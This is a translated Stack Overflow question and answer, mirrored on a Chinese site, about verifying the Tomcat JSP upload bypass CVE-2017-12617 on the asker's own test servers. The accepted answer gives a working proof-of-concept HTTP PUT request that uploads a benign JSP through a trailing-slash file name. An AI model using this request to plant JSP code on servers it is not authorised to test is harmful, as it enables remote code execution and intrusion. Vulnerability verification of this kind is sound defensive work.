首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >问答首页 >tomcat漏洞的有效利用: JSP上传旁路CVE-2017-12617

tomcat漏洞的有效利用: JSP上传旁路CVE-2017-12617
EN

Stack Overflow用户
提问于 2017-10-27 07:31:52
回答 1查看 3.9K关注 0票数 1

https://lists.apache.org/thread.html/3fd341a604c4e9eab39e7eaabbbac39c30101a022acc11dd09d7ebcb@%3Cannounce.tomcat.apache.org%3E

我有一个tomcat 6.x、7.x和8.x以及JBoss7.2.x作为服务器运行在windows上。我在webapp目录下创建了一个web应用程序。我修改了$TOMCAT_HOME/conf/web.xml,并将readonly参数设置为false(默认情况下为true)。然后,我运行了开发https://www.exploit-db.com/exploits/42966/ --这是一个python脚本,试图使用HTTP上传一个有效负载。我运行了以下命令行:

Python42966.py -u http://localhost:9292/ExploitTest

我得到了一个

1) tomcat 8.0.x中的Http 404状态(资源未找到),

2) Http 400状态(坏请求)来自tomcat 6.x和

3) Http 400状态来自tomcat 7.x。

我原以为运行上述python漏洞将导致tomcat服务器中的HTTP 201 (新创建的资源)。剥削是怎么回事?还是我没有正确设置tomcat以防范该漏洞?是否存在基于curl或java的漏洞或其他可用于验证我的服务器是否确实易受攻击的漏洞?

EN

回答 1

Stack Overflow用户

回答已采纳

发布于 2017-10-27 08:41:46

https://www.peew.pw/blog/2017/10/9/new-vulnerability-same-old-tomcat-cve-2017-12615上找到了答案。最初,请求是在bug.cgi?id=61542进行的。

我在上面的链接中使用Burp Suite来制作POC请求。

代码语言:javascript
运行
复制
PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.103:8080/examples/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26

<% out.println("hello");%>

这就行了!

票数 1
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/46969743

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档